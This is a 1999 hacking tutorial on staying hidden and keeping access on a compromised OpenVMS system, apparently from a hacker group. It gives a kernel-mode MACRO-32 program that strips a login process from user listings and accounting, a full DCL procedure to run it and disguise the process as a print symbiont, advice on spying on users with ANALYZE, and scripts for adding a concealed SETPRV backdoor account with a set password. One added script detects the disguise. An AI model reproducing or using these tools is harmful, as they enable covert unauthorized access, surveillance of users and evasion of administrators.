vms3.txt
Posted Aug 17, 1999

tags | paper
SHA-256 | c6d9d5802ff592b1c67ca81b664eca4260fa33683d911068735a74fff85a851a

Introduction to VMS - Part III.
gr1p@b4b0.org

As promised, here is Part III, so we can continue the introduction to VMS
with this paper and move on to more interesting material later. The previous
paper in this introductory series covered getting into the box, looking at
user privileges and gaining more accounts. This one carries on where Part II
left off: I am going to show how to make yourself as invisible as possible to
other users so that your access lasts as long as it can, outline ways of
spying on users and monitoring system activity, and finish with adding
system accounts.

--> Making yourself invisible

Most of this section comes down to common sense and being aware of the other
people on the machine. If you go around deleting users' data you will arouse
suspicion and increase the chance of getting caught. The aim is to keep
access for as long as possible, so cut out suspicious activity and play it
safe.

There are several steps you must take to make sure you stay hidden on the
system; I'll outline as many as I can.

The first thing to do is to hide from the SHOW USERS command (the equivalent
of who on UNIX), which lets anyone list the interactive users on the system.
As you need to be a ghost on the system, you need to do something so that you
do not appear when someone runs SHOW USERS. A common trick is to turn your
login process into a non-interactive process, which drops it from SHOW USERS,
but the process is still listed for anyone who runs SHOW SYSTEM, which shows
every process on the machine. The way around that, which I was originally
shown and still use because it is so simple, is to disguise your login
process as one of the print symbiont processes that SHOW SYSTEM lists.

SHOW SYSTEM at the DCL prompt prints one line for every process on the
system: the PID, the process name, the scheduler state, the base priority,
the I/O count, the CPU time used, the page-fault count and the number of
pages the process currently holds. Among the names you will see system
processes such as:

SYMBIONT_11, NETBIOS, CRON, OPERATOR, etc.

Below is a short sample of SHOW SYSTEM output (not the complete list), with
the column header that SHOW SYSTEM prints above it:

    Pid    Process Name     State  Pri    I/O        CPU        Page flts  Pages
0000010A   AUDIT_SERVER     HIB      9     77  0 00:00:00.21        592    626
0000010B   JOB_CONTROL      HIB      9    418  0 00:00:00.77        239    378
0000010C   QUEUE_MANAGER    HIB      8   1936  0 00:00:07.75       1128   1514
0000010D   SECURITY_SERVER  HIB     10    102  0 00:00:00.65       1140   1344
00000126   AppleTalk ACP    HIB      9     49  0 00:00:00.08        195    356
00000127   ATKGW$ACP        HIB      9     53  0 00:00:00.04        131    220
00000128   MSAF$SERVER0     HIB      6   4750  0 00:00:07.42       1842    122
00000129   SYMBIONT_8       HIB      4      8  0 00:00:00.11        432     77
0000012A   MSAP$RCVR0       HIB      6     31  0 00:00:00.24        982    666
0000012B   SYMBIONT_9       HIB      4      8  0 00:00:00.14        453     92
0000012C   MSAP$RCVR1       HIB      6     23  0 00:00:00.21       1021    561
0000012D   MSAP$RCVR2       HIB      6     16  0 00:00:00.17        911    516
0000012E   SYMBIONT_10      HIB      4      8  0 00:00:00.13        438     77
00000130   SYMBIONT_11      HIB      4      8  0 00:00:00.13        453     92
00000131   MSAP$RCVR4       HIB      6     23  0 00:00:00.19       1022    516
00000132   MSAP$RCVR5       HIB      6     37  0 00:00:00.13       1001    516
00000134   CRON             HIB      6    458  0 00:00:01.91        339    406
0000015A   GIT393           HIB      5   1810  0 00:00:01.02       1269    710
00000162   AEB477           HIB      6   4486  0 00:00:02.13       1861    717
00000165   MKR121           HIB      5    873  0 00:00:00.82       1383    732

You will notice from the table above, and probably from the ones you see
yourself, that there are quite a few SYMBIONT_nn entries. These are print
symbionts, the processes the queue manager starts to serve print queues, so a
machine with a lot of printers (a university department, say) will have
several of them. That makes them a perfect place to hide a login process and
become invisible on the system.

What I usually do is rename my login process to SYMBIONT_666, so that it
looks like yet another print symbiont to anyone who runs SHOW SYSTEM. Using
the table above as the example, our username is MKR121; remember that. Before
the rename, though, the process has to be taken off the SHOW USERS list, and
that is done by the MACRO-32 program below. It is called stealth.mar, I do
not know who wrote it originally, and because it enters kernel mode with
$CMKRNL_S it only works from an account that already holds the CMKRNL
privilege.

-- snip --

        .library /sys$library:lib.mlb/      ; system macro library, supplies $PCBDEF
        .link    /sys$system:sys.stb/       ; executive symbol table, supplies sys$gw_ijobcnt

        $pcbdef                             ; PCB field offsets and status bits

        .entry  no_user,^m<>
        $cmkrnl_s routin=blast_it           ; run blast_it in kernel mode (needs CMKRNL)
        ret

        .entry  blast_it,^m<>               ; called with r4 = address of our own PCB
        tstl    pcb$l_owner(r4)             ; subprocess (has an owner)? leave it alone
        bneq    outta_here
        bbcc    #pcb$v_inter,pcb$l_sts(r4),outta_here ; clear the INTERACTIVE bit; skip if already clear
        clrb    pcb$t_terminal(r4)          ; zero the terminal name (counted string)
        decw    g^sys$gw_ijobcnt            ; one fewer interactive job on the system
        bisl    #pcb$m_noacnt,pcb$l_sts(r4) ; switch off accounting for this process
outta_here:
        movl    #ss$_normal,r0              ; return success to $CMKRNL_S
        ret

        .end    no_user

-- snip --

To get it onto the system, first run

$ create stealth.mar

then type the code in and press Ctrl-Z to close the file and return to the
DCL prompt. With stealth.mar on the system, assemble it, link it and run it
to make your login process non-interactive. The command lines below do that
and clean up afterwards.

$ macro stealth

$ link /nomap stealth

$ delete stealth.obj;*

$ delete stealth.mar;*

$ run stealth

$ del stealth.exe;*

Once that is done, run SHOW SYSTEM again and look for the highest-numbered
SYMBIONT_ entry, SYMBIONT_11 in our table. I usually use SYMBIONT_666, but it
is more sensible to take the number after the last real symbiont so that the
name looks like part of the sequence. In the table above that means hiding
our login process as SYMBIONT_12, with the command line below.

$ set proc/name="SYMBIONT_12"

This renames your login process to SYMBIONT_12, a print symbiont to the
casual eye, as we can see when we run SHOW SYSTEM once more:

    Pid    Process Name     State  Pri    I/O        CPU        Page flts  Pages
0000010A   AUDIT_SERVER     HIB      9     77  0 00:00:00.21        592    626
0000010B   JOB_CONTROL      HIB      9    418  0 00:00:00.77        239    378
0000010C   QUEUE_MANAGER    HIB      8   1936  0 00:00:07.75       1128   1514
0000010D   SECURITY_SERVER  HIB     10    102  0 00:00:00.65       1140   1344
00000126   AppleTalk ACP    HIB      9     49  0 00:00:00.08        195    356
00000127   ATKGW$ACP        HIB      9     53  0 00:00:00.04        131    220
00000128   MSAF$SERVER0     HIB      6   4750  0 00:00:07.42       1842    122
00000129   SYMBIONT_8       HIB      4      8  0 00:00:00.11        432     77
0000012A   MSAP$RCVR0       HIB      6     31  0 00:00:00.24        982    666
0000012B   SYMBIONT_9       HIB      4      8  0 00:00:00.14        453     92
0000012C   MSAP$RCVR1       HIB      6     23  0 00:00:00.21       1021    561
0000012D   MSAP$RCVR2       HIB      6     16  0 00:00:00.17        911    516
0000012E   SYMBIONT_10      HIB      4      8  0 00:00:00.13        438     77
00000130   SYMBIONT_11      HIB      4      8  0 00:00:00.13        453     92
00000131   MSAP$RCVR4       HIB      6     23  0 00:00:00.19       1022    516
00000132   MSAP$RCVR5       HIB      6     37  0 00:00:00.13       1001    516
00000134   CRON             HIB      6    458  0 00:00:01.91        339    406
0000015A   GIT393           HIB      5   1810  0 00:00:01.02       1269    710
00000162   AEB477           HIB      6   4486  0 00:00:02.13       1861    717
00000165   SYMBIONT_12      HIB      5    873  0 00:00:00.82       1383    732

Notice that SYMBIONT_12 now sits where MKR121, your login process, used to
be, so a casual SHOW USERS or SHOW SYSTEM will not give you away. It is not
perfect, though: SET PROCESS/NAME changes nothing but the name, so the process
still belongs to the MKR121 username and UIC, which SHOW PROCESS/ID=165 or
F$GETJPI will show to anyone who looks, and its counters (priority 5, 873
I/Os, 1383 page faults) do not match the real symbionts, which all sit at
priority 4 with 8 I/Os.
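The whole procedure above, rolled into one DCL command procedure, as an added example that is not part of the original paper. It assumes stealth.mar is in the current directory and that the account already holds CMKRNL and WORLD; instead of guessing the symbiont number it walks the process list with F$PID and F$GETJPI and takes the number after the highest SYMBIONT_n it finds. The file name, symbol names and labels are my own.

```dcl
$! HIDE.COM: added example, not from the original paper.
$! Assumes STEALTH.MAR (the program above) is in the current directory and
$! that the account already holds CMKRNL (required by $CMKRNL_S) and WORLD
$! (required to read other groups' process names with F$GETJPI).
$ on error then goto cleanup
$ if .not. f$privilege("CMKRNL,WORLD") then goto noprivs
$!
$! Assemble, link and run the kernel-mode program from the text.
$ macro stealth
$ link /nomap stealth
$ run stealth
$!
$! Find the highest SYMBIONT_n already on the system so the new name
$! continues the sequence; a real site never has a SYMBIONT_666.
$ highest = 0
$ ctx = ""
$next_pid:
$ pid = f$pid(ctx)
$ if pid .eqs. "" then goto rename
$ name = f$getjpi(pid, "PRCNAM")
$ if f$extract(0, 9, name) .nes. "SYMBIONT_" then goto next_pid
$ n = f$integer(f$extract(9, f$length(name) - 9, name))
$ if n .gt. highest then highest = n
$ goto next_pid
$rename:
$ newname = "SYMBIONT_" + f$string(highest + 1)
$ set process/name="''newname'"
$ write sys$output "now running as ", newname
$ goto cleanup
$noprivs:
$ write sys$output "CMKRNL and WORLD are required; see Part II"
$cleanup:
$! Remove the source, object and image whether or not the rename happened.
$ if f$search("stealth.mar") .nes. "" then delete stealth.mar;*
$ if f$search("stealth.obj") .nes. "" then delete stealth.obj;*
$ if f$search("stealth.exe") .nes. "" then delete stealth.exe;*
$ exit
```

Run it with $ @HIDE from the login process you want to hide. The rename is done last on purpose: if the assembly or the kernel-mode run fails, ON ERROR sends control to the cleanup label and the process keeps its real name rather than ending up as a SYMBIONT that still shows in SHOW USERS.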

--> Monitoring Activity

There are many ways to monitor activity, from simply seeing who is logged
onto the box with SHOW USERS to more in-depth monitoring with the ANALYZE
commands. If you have the CMKRNL privilege, which as Part II explained lets a
process change mode to kernel and is one of the most powerful privileges on a
VMS box, you can use ANALYZE/SYSTEM. This runs the System Dump Analyzer (SDA)
against the running system and gives an extremely detailed breakdown of what
each process is doing: its state, memory usage, open channels and the files
behind them, and so on. It is the ultimate monitoring command in VMS and
should always be used once you have CMKRNL. Another one is ANALYZE/AUDIT,
which runs the Audit Analysis Utility over the security audit journal
(SYS$MANAGER:SECURITY.AUDIT$JOURNAL by default). It needs read access to that
file, which normally means system privileges, and it is also where your own
activity turns up if auditing is enabled, so it is worth a look. Other
ANALYZE commands are as follows (bits taken from HELP)..

ANALYZE/DISK_STRUCTURE checks the Files-11 structure of a disk volume and
reports inconsistencies (closer to the UNIX fsck command than to df); with
/REPAIR it fixes them.

ANALYZE/ERROR_LOG reports the contents of the error log file.

ANALYZE/IMAGE describes the contents of an executable image file.

ANALYZE/OBJECT describes the contents of an object module.

As you can see, the ANALYZE commands can tell you a great deal about your
hacked system and its users, but remember that ANALYZE/SYSTEM requires CMKRNL
and ANALYZE/AUDIT requires access to the audit journal.

Another useful command for looking at system activity, not so much current
activity as the state of things, is SHOW. Most of the variants below report
only on your own process, but if the account is a "stolen" one that still
tells you something about its legitimate owner. Some uses of SHOW are as
follows (from HELP); note that these are keywords, not qualifiers, so it is
SHOW QUOTA rather than SHOW/QUOTA..

SHOW QUOTA displays your current disk quota on the box's disk volume.

SHOW DEFAULT displays the current default device and directory.

SHOW ERROR displays the error count for all devices with error counts above
zero.

SHOW WORKING_SET displays the working set limit, quota and extent assigned to
the current process.

SHOW ACCOUNTING shows which resources the current accounting file is
tracking.

As the list shows, SHOW helps you learn about your own account, but it is
nowhere near as powerful as ANALYZE.
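A monitoring procedure of the kind this section describes, added here as an example and not taken from the original paper. It uses the F$PID and F$GETJPI lexical functions rather than parsing SHOW output, and it doubles as the check an administrator would run against the renamed-symbiont trick from the previous section. The username, mode and terminal tests, and the assumption that real symbionts run under the SYSTEM username, are mine.

```dcl
$! CHECK_SYMBIONTS.COM: added example, not from the original paper.
$! Lists every process named SYMBIONT_n and flags the ones that do not look
$! like a print symbiont. SET PROCESS/NAME changes only the name: username,
$! UIC, mode and terminal stay as they were, and F$GETJPI reads them from the
$! running process. Needs WORLD to inspect processes outside your UIC group.
$ if .not. f$privilege("WORLD") then goto noprivs
$ ctx = ""
$ suspects = 0
$next_pid:
$ pid = f$pid(ctx)
$ if pid .eqs. "" then goto done
$ name = f$getjpi(pid, "PRCNAM")
$ if f$extract(0, 9, name) .nes. "SYMBIONT_" then goto next_pid
$ user = f$edit(f$getjpi(pid, "USERNAME"), "TRIM")
$ mode = f$getjpi(pid, "MODE")
$ term = f$getjpi(pid, "TERMINAL")
$ verdict = "ok"
$! Real print symbionts are started by the queue manager: on a stock system
$! they run under the SYSTEM username, as detached (mode OTHER) processes,
$! with no terminal. A renamed login keeps its owner's username even after
$! the kernel-mode patch has cleared the interactive bit and the terminal
$! name, so the username test is the one that still fires afterwards.
$ if term .nes. "" then verdict = "SUSPECT: has a terminal (" + term + ")"
$ if mode .nes. "OTHER" then verdict = "SUSPECT: mode is " + mode
$ if user .nes. "SYSTEM" then verdict = "SUSPECT: runs as " + user
$ if verdict .nes. "ok" then suspects = suspects + 1
$ write sys$output pid, "  ", name, "  ", user, "  ", mode, "  ", verdict
$ goto next_pid
$done:
$ write sys$output f$string(suspects), " suspect SYMBIONT process(es)"
$ if suspects .gt. 0 then write sys$output "follow up with SHOW PROCESS/ID=<pid>/ALL"
$ exit
$noprivs:
$ write sys$output "WORLD privilege is required to inspect other users' processes"
$ exit
```

Against the second SHOW SYSTEM table above this would print one SUSPECT line for PID 00000165, because that process still runs as MKR121 (and, if stealth.mar was not run first, still has an interactive mode and a terminal). SHOW PROCESS/ID=165/ALL then shows the same username, the UIC and the login time.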

--> Adding your own accounts

You may feel confident enough to add your own accounts to a VMS box, and
this is easily done with a few command lines.

You use the AUTHORIZE utility, which lives in the SYS$SYSTEM directory along
with the user authorization file (SYSUAF.DAT, the VMS equivalent of the
password file) and the rights database (RIGHTSLIST.DAT). AUTHORIZE opens the
authorization file through the SYSUAF logical name; set your default
directory to SYS$SYSTEM first, as the manuals recommend, so that it cannot
fail to find the real file and offer to create a fresh, empty SYSUAF.DAT in
your own directory instead. Writing to SYSUAF needs SYSPRV (or the ability to
turn it on), so do this from a privileged account.

$ set default sys$system

Next, run the AUTHORIZE program.

$ run authorize

This will then present you with the following prompt, funnily enough called
a UAF prompt.

UAF>

UAF stands for User Authorization File, and this is where you make the
modifications that create your new account. To add an account, run the
following command line at the UAF prompt.

UAF> add gr1p /password=t34mb4b0/priv=setprv

This adds the user gr1p with the password t34mb4b0 to the box. AUTHORIZE
writes the record to SYSUAF.DAT and adds a matching identifier to
RIGHTSLIST.DAT. The account was set up with the SETPRV privilege, which lets
the process turn on any other privilege with SET PROCESS/PRIVILEGES, so it
is really as powerful as giving it everything; but a record that lists only
SETPRV is far less conspicuous in UAF output than one with ALL. Most of you
will know that on a UNIX system a new UID/GID 0 account in /etc/passwd looks
_very_ conspicuous; the same goes for an obviously all-privileged account on
a VMS box. Bear in mind too that the ADD itself is an AUTHORIZATION-class
security event, so if that audit class is enabled (SHOW AUDIT lists the
enabled classes) it is recorded in the audit journal for ANALYZE/AUDIT to
find.
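The AUTHORIZE session as a complete command procedure, added here as an example and not part of the original paper. The UIC [200,201], the owner string and the login directory are assumptions; everything the one-line ADD above leaves out is copied from the DEFAULT record, which is why a usable account normally specifies them explicitly.

```dcl
$! ADD_ACCOUNT.COM: added example, not from the original paper.
$! Creates the GR1P account from the text with the fields a usable record
$! needs. The UIC [200,201], owner string and login directory are
$! assumptions; check that the UIC is free first (UAF> SHOW /BRIEF *).
$! Writing SYSUAF.DAT and RIGHTSLIST.DAT needs SYSPRV, so run this from the
$! privileged account you already hold. Lines without a leading $ are read
$! by AUTHORIZE as its own input.
$ set default sys$system
$ run authorize
add GR1P /password=t34mb4b0 /uic=[200,201] /owner="GR1P" /device=SYS$SYSDEVICE /directory=[GR1P] /privileges=SETPRV
show GR1P /brief
exit
$! Without a login directory owned by the new UIC the account cannot set its
$! default directory at login; create it to match the record.
$ create/directory/owner_uic=[200,201] sys$sysdevice:[gr1p]
$ exit
```

/PRIVILEGES sets the authorized mask only; at login the process starts with the default privileges inherited from the DEFAULT record, so the first thing the new account does is $ SET PROCESS/PRIVILEGES=SETPRV followed by $ SET PROCESS/PRIVILEGES=ALL. The SHOW /BRIEF line is there so you can see the UIC and privilege summary before leaving AUTHORIZE.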

That concludes my three-part introduction to VMS; you should now have the
basic knowledge needed to explore the world of VMS hacking. Good luck. :)

I'd just like to say werd to Substance for always keeping 9x tight.
Remember, only you can do it bro. :>

Finally, as always, the links..

9x -> http://www2.dope.org/9x
b4b0 -> http://www.b4b0.org

Look out for more VMS related texts soon..

gr1p
gr1p@b4b0.org
http://www.b4b0.org/gr1p